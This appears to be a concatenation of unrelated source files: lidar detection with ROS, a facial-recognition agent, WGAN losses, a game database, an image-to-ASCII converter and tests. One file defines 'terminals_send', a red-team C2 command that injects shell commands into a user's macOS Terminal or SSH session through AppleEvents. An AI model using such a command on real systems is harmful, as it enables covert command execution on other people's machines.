# # 4: 'anchor_mask', 5: 'pc_idx']
#
# example_tuple = list(example.values())
# example_tuple[5] = torch.from_numpy(example_tuple[5])
# # example_tuple[9] = torch.from_numpy(example_tuple[9])
#
# if (example_tuple[3].size()[0] != input_cfg.batch_size):
# continue
#
# dt_annos += predict_kitti_to_anno(
# net, example_tuple, class_names, center_limit_range,
# model_cfg.lidar_input, global_set)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='testing')
    args = parser.parse_args()
    # Hard-coded checkpoint directory and pipeline config for this deployment.
    model_dir = "/nfs/nas/model/songhongli/neolix_shanghai_3828/"
    config_path = "/home/songhongli/Projects/pointpillars2/second/configs/pointpillars/xyres_16_4cls.proto"
    # Accept either a path to a .proto text config or an already-parsed config.
    if isinstance(config_path, str):
        config = pipeline_pb2.TrainEvalPipelineConfig()
        with open(config_path, "r") as f:
            proto_str = f.read()
        text_format.Merge(proto_str, config)
    else:
        config = config_path
    input_cfg = config.eval_input_reader
    model_cfg = config.model.second
    train_cfg = config.train_config
    class_names = list(input_cfg.class_names)
    center_limit_range = model_cfg.post_center_limit_range
    #########################
    # Build Voxel Generator
    #########################
    voxel_generator = voxel_builder.build(model_cfg.voxel_generator)
    bv_range = voxel_generator.point_cloud_range[[0, 1, 3, 4]]
    box_coder = box_coder_builder.build(model_cfg.box_coder)
    target_assigner_cfg = model_cfg.target_assigner
    target_assigner = target_assigner_builder.build(target_assigner_cfg,
                                                    bv_range, box_coder)
    # Build the network on the GPU and restore the latest checkpoint.
    net = second_builder.build(model_cfg, voxel_generator, target_assigner, input_cfg.batch_size)
    net.cuda()
    torchplus.train.try_restore_latest_checkpoints(model_dir, [net])
    # code added for using ROS
    rospy.init_node('pointpillars_ros_node')
    sub_ = rospy.Subscriber("/sensor/velodyne16/all/compensator/PointCloud2", PointCloud2, callback, queue_size=1)
    pub_points = rospy.Publisher("points_modified", PointCloud2, queue_size=1)
    pub_arr_bbox = rospy.Publisher("pre_arr_bbox", BoundingBoxArray, queue_size=10)
    # pub_bbox = rospy.Publisher("voxelnet_bbox", BoundingBox, queue_size=1)
    print("[+] voxelnet_ros_node has started!")
    rospy.spin()
| 18,417 | 6,916 |
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
    """ HIAS TassAI Facial Recognition Agent

    HIAS TassAI Facial Recognition Agent processes
    streams from local or remote cameras to identify
    known and unknown humans.
    """

    def set_model(self, mtype):
        # Inititializes the TassAI model.
        # NOTE(review): ``mtype`` is accepted but unused here -- confirm it is
        # required by the AbstractAgent interface.
        self.model = model(self.helpers)

    def load_model(self):
        """ Loads the trained model """

        # Prepares the network and data
        self.model.prepare_network()
        self.model.prepare_data()

    def server(self):
        """ Loads the API server """

        # Starts the MQTT connection (mqtt_start presumably provided by
        # AbstractAgent)
        self.mqtt_start()

        # Inititializes the socket
        self.sockets = sockets(self.helpers)

        # Loads the TassAI model
        self.load_model()

        # Camera read and stream threads; daemon=True so they die with the
        # main process.
        Thread(target=read.run, args=(self, ),
               daemon=True).start()
        Thread(target=stream.run, args=(self, ),
               daemon=True).start()

    def signal_handler(self, signal, frame):
        # Disconnect MQTT cleanly before exiting on a caught signal.
        self.helpers.logger.info("Disconnecting")
        self.mqtt.disconnect()
        sys.exit(1)
# Module-level singleton. NOTE(review): this rebinds the name ``agent`` from
# the class to an instance, making the class unreachable afterwards.
agent = agent()
def main():
    """CLI entry point.

    Validates ``sys.argv[1]`` against the configured agent params, then
    dispatches: ``classify`` -> inference, ``server`` -> API server.
    """

    if len(sys.argv) < 2:
        agent.helpers.logger.info(
            "You must provide an argument")
        exit()
    elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
        agent.helpers.logger.info(
            "Mode not supported! server, train or inference")
        exit()

    mode = sys.argv[1]

    if mode == "classify":
        agent.set_model("")
        # NOTE: inference() is presumably inherited from AbstractAgent.
        agent.inference()
    elif mode == "server":
        agent.set_model("")
        agent.server()
    else:
        # FIX: previously a mode that passed the config check but was neither
        # "classify" nor "server" fell through silently; fail loudly instead.
        agent.helpers.logger.info(
            "Mode has no handler in this agent")
        exit()


if __name__ == "__main__":
    main()
| 3,112 | 1,063 |
# -*- coding: utf-8 -*-
class LineConstants:
    """String constants naming the recognised line roles."""

    method, output, enter, parent, command, service = (
        'method', 'output', 'enter', 'parent', 'command', 'service',
    )
from CommandBase import *
import json
from MythicResponseRPC import *
class TerminalsSendArguments(TaskArguments):
    """Arguments for terminals_send: target window/tab plus the shell command."""

    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = {
            "window": CommandParameter(
                name="window",
                type=ParameterType.Number,
                description="window # to send command to",
            ),
            "tab": CommandParameter(
                name="tab",
                type=ParameterType.Number,
                description="tab # to send command to",
            ),
            "command": CommandParameter(
                name="command",
                type=ParameterType.String,
                description="command to execute",
            ),
        }

    async def parse_arguments(self):
        """Parse the raw command line, which must be a JSON object."""
        if not self.command_line:
            raise ValueError("Missing arguments")
        if self.command_line[0] != "{":
            raise ValueError("Missing JSON arguments")
        self.load_args_from_json_string(self.command_line)
class TerminalsSendCommand(CommandBase):
    # Metadata consumed by the Mythic framework.
    cmd = "terminals_send"
    needs_admin = False
    help_cmd = "terminals_send"
    description = """
    This uses AppleEvents to inject the shell command, {command}, into the specified terminal shell as if the user typed it from the keyboard. This is pretty powerful. Consider the instance where the user is SSH-ed into another machine via terminal - with this you can inject commands to run on the remote host. Just remember, the user will be able to see the command, but you can always see what they see as well with the "terminals_read contents" command.
    """
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@its_a_feature_"
    attackmapping = ["T1059", "T1184"]
    argument_class = TerminalsSendArguments

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        """Register the artifacts this command leaves behind, then pass the
        task through unchanged."""
        # The injected shell command is recorded as a process-creation artifact.
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="{}".format(
                task.args.get_arg("command"),
            ),
            artifact_type="Process Create",
        )
        # Injection itself happens via an AppleEvent aimed at Terminal.
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="Target Application of Terminal",
            artifact_type="AppleEvent Sent",
        )
        return task

    async def process_response(self, response: AgentResponse):
        # No post-processing of the agent's response is needed.
        pass
| 2,576 | 654 |
import tensorflow as tf
from tensorflow.keras import backend
#DEPRECATED
# An implementation of wasserstein used for a naive implementation of WGAN
# calculate wasserstein loss
def wasserstein_loss(y_true, y_pred):
    """Wasserstein critic loss: mean of the elementwise label*score product."""
    weighted = y_true * y_pred
    return backend.mean(weighted)
# Define the loss functions for the discriminator,
# which should be (fake_loss - real_loss).
# We will add the gradient penalty later to this loss function.
def discriminator_loss(real_img, fake_img):
    """Critic losses for WGAN.

    Returns ``(real_loss, fake_loss, fake_loss - real_loss)``; the gradient
    penalty is added to the third term elsewhere.
    """
    real_loss = tf.reduce_mean(real_img)
    fake_loss = tf.reduce_mean(fake_img)
    critic_loss = fake_loss - real_loss
    return real_loss, fake_loss, critic_loss
# Define the loss functions for the generator.
def generator_loss(fake_img):
    """Generator loss: negated mean critic score on generated images."""
    mean_score = tf.reduce_mean(fake_img)
    return -mean_score
| 711 | 226 |
import re
import math
import numexpr as ne
# Named constants made available to numexpr via local_dict.
MATH_CONST = {
    'pi': math.pi,
    'π': math.pi,
    'e': math.e,
    'inf': math.inf,
    'i': 1j,
    'j': 1j,
}

# Literal rewrites applied to input text before evaluation.
SUB_MAP = {
    # replace UTF char with ASCII char
    '(': '(',
    ')': ')',
    ',': ',',
    '-': '-',
    '÷': '/',
    '×': '*',
    '+': '+',
    # replace common synonym
    'ln': 'log',
    'lg': 'log10',
    '∞': 'inf',
    'mod': '%',
}

# One compiled alternation matching any SUB_MAP key (keys are re.escape-d,
# so regex metacharacters in them are safe).
SUB_RE = re.compile('|'.join(re.escape(s) for s in SUB_MAP.keys()))
def evaluate(txt: str):
    """Normalise unicode/synonym tokens in *txt*, then evaluate with numexpr."""
    normalised = SUB_RE.sub(lambda match: SUB_MAP[match.group(0)], txt)
    result = ne.evaluate(normalised, local_dict=MATH_CONST)
    return result.item()
| 623 | 278 |
from collections import Mapping
from . import yang_models
class Meta(type):
    # Metaclass carrying the Interface wrapper; classes using this metaclass
    # can reach it as a class attribute (``TestNetwork.Interface``), since
    # class attribute lookup falls back to the metaclass.
    class Interface(
            yang_models
            .com_adva_netemu_testemu_client_TestInterface_YangListModel):
        """
        Pythonizer for Java class ``TestInterface``.
        From Java package ``com.adva.netemu.testemu.client``
        """
class TestNetwork(
        yang_models.com_adva_netemu_testemu_client_TestNetwork_YangModel,
        metaclass=Meta):
    """
    Pythonizer for Java class ``TestNetwork``.
    From Java package ``com.adva.netemu.testemu.client``
    """

    @property
    def interfaces(self):
        """Read-only mapping of interface name -> wrapped ``Interface``."""
        outer = self  # captured by the local mapping class below

        class List(Mapping):
            # FIX: these were @staticmethod dunders taking no argument, but
            # ``len(obj)``/``iter(obj)`` invoke ``type(obj).__len__(obj)``
            # etc., so they raised TypeError (and broke Mapping's mixin
            # methods such as .items()). They are proper instance methods now.
            def __len__(self):
                return len(outer._java_object.getInterfaces())

            def __iter__(self):
                for intf in outer._java_object.getInterfaces():
                    # type(outer) is TestNetwork; Interface resolves via Meta.
                    yield type(outer).Interface(intf)

            def __getitem__(self, name):
                for intf in self:
                    if intf.name() == name:
                        return intf
                raise KeyError(name)

        return List()
| 1,185 | 327 |
import gym
import torch
from asym_rlpo.utils.debugging import checkraise
from .base import Representation
class IdentityRepresentation(Representation):
    """Pass-through representation for flat (rank-1) Box input spaces."""

    def __init__(self, input_space: gym.spaces.Box):
        super().__init__()
        is_flat_box = (
            isinstance(input_space, gym.spaces.Box)
            and len(input_space.shape) == 1
        )
        checkraise(
            is_flat_box,
            TypeError,
            'input_space must be Box',
        )
        (self.__out_dim,) = input_space.shape

    @property
    def dim(self):
        """Output dimensionality (identical to the input dimensionality)."""
        return self.__out_dim

    def forward(  # pylint: disable=no-self-use
        self, inputs: torch.Tensor
    ) -> torch.Tensor:
        """Return the inputs unchanged."""
        return inputs
| 666 | 205 |
import sys
import traceback
from ggplib.util import log
from ggplib.statemachine import builder
from ggplib.db import signature
class GameInfo(object):
    """Lazily-initialised metadata for one game: raw GDL plus (on demand)
    its signature index, symbol map, statemachine and model."""

    def __init__(self, game, gdl_str):
        self.game = game
        self.gdl_str = gdl_str

        # might be None, depends on whether we grab it from sig.json
        self.idx = None

        # lazy loads in get_symbol_map()
        self.sigs = None
        self.symbol_map = None

        # lazy loads
        self.sm = None
        self.model = None

    def get_symbol_map(self):
        # Compute signatures once; if idx was preloaded from sig.json,
        # cross-check it against the freshly computed value.
        if self.sigs is None:
            idx, self.sigs = signature.get_index(self.gdl_str, verbose=False)
            if self.idx is not None:
                assert self.idx == idx
            else:
                self.idx = idx

            self.symbol_map = signature.build_symbol_map(self.sigs, verbose=False)

    def lazy_load(self, the_game_store):
        # Build the statemachine/model on first use and cache in the store.
        if self.sm is None:
            # ok here we can cache the game XXX
            self.model, self.sm = builder.build_sm(self.gdl_str,
                                                   the_game_store=the_game_store,
                                                   add_to_game_store=True)
            log.verbose("Lazy loading done for %s" % self.game)

    def get_sm(self):
        # Callers always receive an independent duplicate, never the shared
        # instance (lazy_load() must have run first).
        return self.sm.dupe()
class TempGameInfo(object):
    """Non-cached holder for a game built directly from raw GDL."""

    def __init__(self, game, gdl_str, sm, model):
        self.game, self.gdl_str = game, gdl_str
        self.sm, self.model = sm, model

    def get_sm(self):
        """Return an independent duplicate of the statemachine."""
        return self.sm.dupe()
class GameInfoBypass(GameInfo):
    ''' bypass everything, special case statemachine that doesn't have any GDL '''
    # Marker checked via getattr(info, "special_game", False) in the database.
    special_game = True

    def __init__(self, game, sm, model):
        # Deliberately does NOT call GameInfo.__init__: there is no GDL text.
        self.game = game
        self.sm = sm
        self.model = model

    def get_symbol_map(self):
        """No-op: no GDL means no signature / symbol map."""

    def lazy_load(self, the_game_store):
        """No-op: the statemachine is already built."""

    def get_sm(self):
        return self.sm.dupe()
###############################################################################
class LookupFailed(Exception):
    """Raised when a game cannot be found in the database."""
class GameDatabase:
    """Index of all games found in the rulesheets store.

    Games are indexed both by name (game_mapping) and by signature index
    (idx_mapping); statemachines are built lazily on first access.
    """

    def __init__(self, root_store):
        self.root_store = root_store
        self.rulesheets_store = root_store.get_directory("rulesheets")
        self.games_store = root_store.get_directory("games", create=True)

        self.idx_mapping = {}
        self.game_mapping = {}

    @property
    def all_games(self):
        # NOTE: returns the live keys view, not a copy.
        return self.game_mapping.keys()

    def load(self, verbose=True):
        """Scan *.kif rulesheets, ensure each has a cached sig.json, and
        index every game; duplicate signatures are fatal."""
        if verbose:
            log.info("Building the database")

        filenames = self.rulesheets_store.listdir("*.kif")
        for fn in sorted(filenames):
            # skip tmp files
            if fn.startswith("tmp"):
                continue

            game = fn.replace(".kif", "")

            # get the gdl
            gdl_str = self.rulesheets_store.load_contents(fn)

            info = GameInfo(game, gdl_str)

            # first does the game directory exist?
            the_game_store = self.games_store.get_directory(game, create=True)
            if the_game_store.file_exists("sig.json"):
                # cached signature index: skip the expensive computation
                info.idx = the_game_store.load_json("sig.json")['idx']
            else:
                if verbose:
                    log.verbose("Creating signature for %s" % game)
                info.get_symbol_map()
                if info.symbol_map is None:
                    log.warning("FAILED to add: %s" % game)
                    raise Exception("FAILED TO add %s" % game)

                # save as json
                assert info.idx is not None
                the_game_store.save_json("sig.json", dict(idx=info.idx))

            assert info.idx is not None
            if info.idx in self.idx_mapping:
                other_info = self.idx_mapping[info.idx]
                log.warning("DUPE GAMES: %s %s!=%s" % (info.idx, game, other_info.game))
                raise Exception("Dupes not allowed in database")

            self.idx_mapping[info.idx] = info
            self.game_mapping[info.game] = info

    def get_by_name(self, name):
        """Return the GameInfo for *name*, lazily loading its statemachine.

        Raises LookupFailed if the name is unknown.
        """
        if name not in self.game_mapping:
            raise LookupFailed("Did not find game: %s" % name)

        info = self.game_mapping[name]
        if getattr(info, "special_game", False):
            # bypass games (non-GDL) are pre-built; nothing to lazy load
            return info

        # for side effects
        info.get_symbol_map()

        the_game_store = self.games_store.get_directory(name)
        info.lazy_load(the_game_store)
        return info

    def lookup(self, gdl_str):
        """Find the stored game whose signature matches *gdl_str*.

        Returns (info, new_mapping), where new_mapping translates symbols of
        the incoming GDL to the stored game's symbols, or None if the
        symbols already agree.  Raises LookupFailed if no game matches.
        """
        idx, sig = signature.get_index(gdl_str, verbose=False)
        if idx not in self.idx_mapping:
            raise LookupFailed("Did not find game : %s" % idx)

        info = self.idx_mapping[idx]
        info.get_symbol_map()

        # create the symbol map for this gdl_str
        symbol_map = signature.build_symbol_map(sig, verbose=False)

        new_mapping = {}

        # remap the roles back: both sides normalise roles to "role<i>", so
        # match them up via that canonical name
        roles = info.sigs.roles.items()
        for ii in range(len(roles)):
            match = "role%d" % ii
            for k1, v1 in roles:
                if v1 == match:
                    for k2, v2 in sig.roles.items():
                        if v2 == match:
                            new_mapping[k2] = k1
                            break

        # remap the other symbols
        for k1, v1 in info.symbol_map.items():
            new_mapping[symbol_map[k1]] = v1

        # remove if the keys/values all the same in new_mapping
        all_same = True
        for k, v in new_mapping.items():
            if k != v:
                all_same = False
                break

        if all_same:
            new_mapping = None

        # log.info("Lookup - found game %s in database" % info.game)
        the_game_store = self.games_store.get_directory(info.game)
        info.lazy_load(the_game_store)
        return info, new_mapping
###############################################################################
def install_draughts(add_game):
    ' load custom c++ statemachine for draughts '
    from ggplib import interface
    from ggplib.non_gdl_games.draughts import desc, model

    desc10 = desc.BoardDesc(10)
    cpp_statemachines = interface.CppStateMachines()

    # NOTE(review): rebinds the imported ``model`` module to the built model
    # object; harmless here since the module is not used afterwards.
    model = model.create_sm_model(desc10)
    # All three variants share the model; each gets its own c++ statemachine.
    for game_variant in ["draughts_10x10",
                         "draughts_killer_10x10",
                         "draughts_bt_10x10"]:
        sm_create_meth = getattr(cpp_statemachines, game_variant)
        add_game(game_variant, sm_create_meth(), model)
def install_hex(add_game):
    ' load custom c++ statemachine for hex '
    from ggplib import interface
    from ggplib.non_gdl_games.hex.model import create_sm_model

    cpp_statemachines = interface.CppStateMachines()
    # One game per supported board size.
    for sz in [9, 11, 13, 15, 19]:
        cpp_sm = cpp_statemachines.get_hex(sz)
        model = create_sm_model(sz)
        add_game("hex_lg_%s" % sz, cpp_sm, model)
###############################################################################
# The API:
# Module-wide singleton, created lazily by get_database().
the_database = None


def get_database(verbose=True):
    """Create (once) and return the GameDatabase singleton.

    On first build, also installs the non-GDL draughts and hex
    statemachines; failures there are logged but not fatal.
    """
    global the_database

    def add_game_to_db(game, sm, model):
        # Register a pre-built (non-GDL) statemachine under *game*.
        info = GameInfoBypass(game, sm, model)
        the_database.game_mapping[game] = info

    if the_database is None:
        from ggplib.db.store import get_root
        the_database = GameDatabase(get_root())
        the_database.load(verbose=verbose)

        try:
            install_draughts(add_game_to_db)
        except Exception as err:
            log.error("Failed to install draughts: %s" % err)

        try:
            install_hex(add_game_to_db)
        except Exception as err:
            log.error("Failed to install hex: %s" % err)

    return the_database
def get_all_game_names():
    """Names of every game known to the (lazily created) database."""
    database = get_database()
    return database.all_games
# XXX build_sm not used.
def by_name(name, build_sm=True):
    """Look up a game by name; any failure is logged and re-raised as
    LookupFailed."""
    try:
        database = get_database(verbose=False)
        return database.get_by_name(name)
    except Exception as exc:
        # creates temporary files
        msg = "Lookup of %s failed: %s" % (name, exc)
        log.error(msg)
        log.error(traceback.format_exc())
        raise LookupFailed(msg)
def by_gdl(gdl):
    """Look up a game by its GDL (a string, or an iterable of symbols).

    Returns (mapping, info).  NOTE: the inner ``raise LookupFailed`` is
    caught by the outer ``except Exception`` below, so an unknown game falls
    through to building a temporary statemachine with mapping None.
    """
    try:
        gdl_str = gdl
        if not isinstance(gdl, str):
            # join symbol objects into one newline-separated GDL string
            lines = []
            for s in gdl:
                lines.append(str(s))
            gdl_str = "\n".join(lines)

        db = get_database()
        try:
            info, mapping = db.lookup(gdl_str)
        except LookupFailed as exc:
            etype, value, tb = sys.exc_info()
            traceback.print_exc()
            raise LookupFailed("Did not find game %s" % exc)

        return mapping, info

    except Exception as exc:
        # creates temporary files
        log.error("Lookup failed: %s" % exc)

        # fall back: build a fresh statemachine for the unknown GDL
        model, sm = builder.build_sm(gdl)
        info = TempGameInfo("unknown", gdl, sm, model)
        return None, info
| 8,885 | 2,762 |
import fiber
from django.test import SimpleTestCase
from ...test_util import RenderMixin
class TestFiberVersion(RenderMixin, SimpleTestCase):
    """The {% fiber_version %} template tag renders fiber.__version__."""

    def test_fiber_version(self):
        # assertRendered comes from the project's RenderMixin test helper.
        self.assertRendered('{% load fiber_tags %}{% fiber_version %}', str(fiber.__version__))
| 274 | 86 |
#! /usr/bin/python3
import sys, re
from PIL import Image
# return the argument if it exists (converted to the same type as the default), otherwise default
default = lambda arg, defa: type(defa)(sys.argv[arg]) if len(sys.argv) > arg and sys.argv[arg] else defa

# filename of image to evaluate, default is image.jpg
IMAGE = default(1, "image.jpg")
# filename of output, default just prints it to stdout
OUTPUT = default(2, "")

# outputs in defined way based on whether or not an output file is given
if OUTPUT == "": output = print
else:
    def output(*args, **kwargs):
        # NOTE: opens/truncates the file on every call; fine here since
        # output() is invoked exactly once at the end of the script.
        with open(OUTPUT, "w+") as ofile:
            ofile.write(*args, **kwargs)

# output columns (width)
COLS = default(3, 200)

# color hues (degrees, [0-360)) loaded from colors.txt;
# values: name -> (hue or None, saturation or None); '*' means "don't care".
COLORS = dict()
with open('colors.txt') as f:
    # each line in the file
    for line in f.readlines():
        # means comment
        if line.startswith('#'): continue
        # name: hue saturation
        # split bt name and values
        line = line.split(':')
        # split values with whitespace characters
        line = [line[0], *line[1].strip().split('\t')]
        # strip blank things from each piece
        for i, piece in enumerate(line): line[i] = piece.strip()
        # add key to COLORS
        name, hue, sat = line
        COLORS[name] = (None if hue == '*' else int(hue), None if sat == '*' else float(sat))

# characters for lightness values (ascending)
CHARS = " -+:!?%#&$@"
# color class
class Color:
    """An RGB colour with channelwise arithmetic and HSL helpers.

    Channels are expected in [0, 255] (floats appear after division);
    ``name`` optionally labels a named palette colour.
    """

    def __init__(self, r=0, g=0, b=0, name=None):
        self.r, self.g, self.b = r, g, b
        self.vals = ('r', 'g', 'b')
        self.name = name

    def reduce(self, reducer, accumulator=0):
        """Fold *reducer* over the three channel values."""
        for v in self.vals:
            accumulator = reducer(accumulator, getattr(self, v))
        return accumulator

    def for_each(self, f):
        """Apply *f* to each channel; return the list of results."""
        return [f(getattr(self, v)) for v in self.vals]

    def on_each(self, other, f):
        """Apply binary *f* channelwise against *other*; return the results."""
        return [f(getattr(self, v), getattr(other, v)) for v in self.vals]

    def __add__(self, color2):
        """Channelwise add with a Color; broadcast add with a scalar."""
        if isinstance(color2, Color):
            return Color(*self.on_each(color2, lambda a, b: a + b))
        return Color(*self.for_each(lambda x: x + color2))

    def __mul__(self, color2):
        """Channelwise multiply with a Color; broadcast with a scalar."""
        if isinstance(color2, Color):
            return Color(*self.on_each(color2, lambda a, b: a * b))
        return Color(*self.for_each(lambda x: x * color2))

    # FIX: __sub__ evaluates ``-1*color2``; without a reflected multiply
    # ``int * Color`` raised TypeError, so Color - Color always failed.
    __rmul__ = __mul__

    def __sub__(self, color2):
        """Subtract another color (or scalar), channelwise."""
        return self + -1*color2

    def __truediv__(self, color2):
        """Channelwise divide by a Color; broadcast with a scalar."""
        if isinstance(color2, Color):
            return Color(*self.on_each(color2, lambda a, b: a / b))
        return Color(*self.for_each(lambda x: x / color2))

    def diff(self, color2):
        """Channelwise absolute difference (like subtraction, never negative)."""
        return Color(*self.on_each(color2, lambda a, b: abs(a - b)))

    def sum(self):
        """Sum of the three channel values."""
        return self.reduce(lambda a, b: a + b)

    def graylightness(self):
        """Lightness in [0, 1]: channel sum over the maximum 3*255 = 765."""
        return self.sum() / 765

    def hsl(self):
        """Return (hue degrees [0, 360), saturation [0, 1], lightness [0, 1])."""
        ## setup
        # normalized version of self
        nself = self / 255
        # rgb values
        vals = nself.for_each(lambda x: x)
        x, n = max(vals), min(vals)  # max value
        d = x - n  # difference bt max and min

        ## hue
        hue = 0
        if d == 0:
            pass  # achromatic: max and min same, hue stays 0
        elif x == nself.r:
            hue = 60*( (nself.g - nself.b) / d % 6 )  # r is max
        elif x == nself.g:
            hue = 60*( (nself.b - nself.r) / d + 2 )  # g is max
        else:
            hue = 60*( (nself.r - nself.g) / d + 4 )  # b is max

        lightness = (x + n) / 2  ## lightness
        saturation = 0 if d == 0 else d / (1 - abs(2*lightness - 1))  ## saturation

        # add 360 to hue if it's negative
        return (hue < 0)*360 + hue, saturation, lightness

    def approx(self, hsl=None):
        """Name of the COLORS entry closest in hue/saturation (lowest score).

        COLORS values store None for wildcard ('*') hue or saturation; a
        wildcard component contributes 0 and re-weights the other one.
        """
        if hsl is None:
            hsl = self.hsl()
        hue, sat = hsl[:2]

        # the best one so far: (score, name)
        best = (None, None)
        for name in COLORS.keys():
            chue, csat = COLORS[name]
            a, am, b, bm = 0, 2, 0, 2
            # if hue does matter
            if chue is not None:
                a, bm = abs(hue - chue)/360, 1
            # if saturation does matter
            if csat is not None:
                b, am = abs(sat - csat), 1
            # weighted sum of hue and saturation differences is the score
            score = a*am + b*bm
            # if this is a new best score
            if best[0] is None or score < best[0]:
                best = (score, name)
        # return the name of the best color
        return best[1]

    def color_str(self, string, colorName):
        """Open-tag-only HTML wrapper; the caller appends the closing </font>."""
        return f'<font color="{colorName}">{string}'
# where the output will be accumulated to
accumulator = '<body style="background-color: #000"><pre>'

# open the image
with Image.open(IMAGE) as img:
    # the step to increment by each time (pixels per output column)
    step = img.size[0] / COLS
    # the vertical step, to account for characters not being squares
    vstep = step * 15/7.81
    # the current color (None forces a <font> tag on the first tile)
    curcolor = None
    # each row
    for row in range(int(img.size[1]/vstep)):
        row *= vstep
        # add newline character to go to next row
        # NOTE(review): comment said "if this isn't the first row" but this
        # runs unconditionally, so the art starts with a newline -- confirm.
        accumulator += '\n'
        # each column
        for col in range(COLS):
            col *= step
            # average the colors for this location
            avgcolor = Color()
            colorc = 0  # color count
            # within this tile/area
            for y in range(int(row), int(row + vstep)):
                for x in range(int(col), int(col + step)):
                    if x >= img.size[0]: break  # break if it's out of range
                    # add this pixel's color to the average
                    avgcolor += Color(*img.getpixel((x, y)))
                    colorc += 1
                if y >= img.size[1]: break  # break if it's out of range
            # turn sum into average
            avgcolor /= colorc
            # get the hsl version
            hsl = avgcolor.hsl()
            # approximate the color
            apcolor = avgcolor.approx(hsl)
            # pick the right character based on the lightness
            char = CHARS[round(hsl[2]*(len(CHARS) - 1))]
            # if it isn't already in the right color, change it
            if apcolor != curcolor:
                # add colored string to accumulator (color_str emits only the
                # opening tag, so close the previous run here)
                accumulator += "</font>" + avgcolor.color_str(char, apcolor)
                # new color
                curcolor = apcolor
            else:
                # add character
                accumulator += char

# end the elements
accumulator += "</font></pre></body>"
# output the result
output(accumulator)
| 7,352 | 2,303 |
import pytest
from coding_challenge.users.models import User
from coding_challenge.users.tests.factories import UserFactory
from coding_challenge.ship_manager.models import Ship
from coding_challenge.ship_manager.tests.factories import ShipFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
    # Route Django MEDIA_ROOT into the per-test tmpdir for every test
    # (autouse), so uploads never touch the real media directory.
    settings.MEDIA_ROOT = tmpdir.strpath


@pytest.fixture
def user() -> User:
    """A factory-built User."""
    return UserFactory()


@pytest.fixture
def ship() -> Ship:
    """A factory-built Ship."""
    return ShipFactory()
| 485 | 155 |
# -*- coding: utf-8 -*-
# @Author: edward
# @Date: 2016-05-12 14:11:21
# @Last Modified by: edward
# @Last Modified time: 2016-05-12 17:29:48
from functools import partial
# api = swagger.docs(Api(app), apiVersion='0.1',
# basePath='http://localhost:5000',
# resourcePath='/',
# produces=["application/json", "text/html"],
# api_spec_url='/api/spec',
# description='A Basic API')
class _APIs:
def __init__(self):
self.apis = []
self.make_docs()
def add_api(self, method, **kw):
self.apis.append(self.pre_api(method, **kw))
def operation(self, **kw):
return partial(self.add_api, **kw)
def pre_api(self, fn, **kw):
d = dict(
method=fn.__name__,
)
d.update(kw)
return d
def get_spec(self):
return self.apis
def make_docs(self, apiVersion='1.0', swaggerVersion='1.2',
basePath='http://localhost:9999',
resourcePath='/',
produces=["application/json"],
api_spec_url='/api/spec',
description='Auto generated API docs by swagger'):
self.API_VERSION = apiVersion
self.SWAGGER_VERSION = swaggerVersion
self.BASE_PATH = basePath
self.RESOURCE_PATH = resourcePath
self.PRODUCES = produces
self.API_SPEC_URL = api_spec_url
self.DESCRIPTION = description
apis = _APIs()
operation = apis.operation
docs = apis.make_docs
get_api_spec = apis.get_spec
def main():
    """Smoke-test: register one handler via @operation and dump the specs."""

    class Handler:
        @operation(
            nickname="get something from api"
        )
        def get(self):
            """this is get notes """
            # FIX: was a Python-2 print statement (``print 'get'``), which is
            # a SyntaxError under Python 3; print() works on both.
            print('get')

        def post(self):
            print('post')

    for i in apis.apis:
        print(i)


if __name__ == '__main__':
    main()
| 1,909 | 627 |
import os
import unittest
import sqlalchemy
from flask import Flask,session,url_for,redirect
from flask_sqlalchemy import SQLAlchemy
from application import create_app ,db
import unittest
import json
from caruser.models import User, UserBank
from carupload.models import CarOption,Car,CarImage
from flask_testing import TestCase
from utilities.dao.userdao import UserDao
from utilities.dao.cardao import CarDao
from utilities.testutil import TestUtil
from freezegun import freeze_time
from datetime import datetime as dt
from datetime import timedelta
from settings import TEST_DB_URI,MONGO_URI
import urllib
from utilities.flask_tracking.documents import Tracking
from mongoengine.queryset.visitor import Q
import os
# Static path holding the image fixtures used by the upload tests below.
TEST_UPLOADED_FOLDER='/static/images/test_images'
class CaruploadTest(TestUtil):
    # Helper: every key in ``data`` must match the corresponding CarOption
    # attribute (a None attribute compares as the empty string).
    def validate_caroption(self,data,carOption):
        for key in data:
            option_data = getattr(carOption,key) if getattr(carOption,key) is not None else ""
            self.assertEqual(data[key],option_data)
# def test_mongoDB_api(self):
# rv = self.client.get(
# '/api/getCarBrand',
# content_type='application/json',
# follow_redirects=True
# )
# data = json.loads(rv.get_data().decode('utf-8'))
# self.assertTrue(len(data) >50)
# self.check_mongoData('brandName','api/getCarClass','기아')
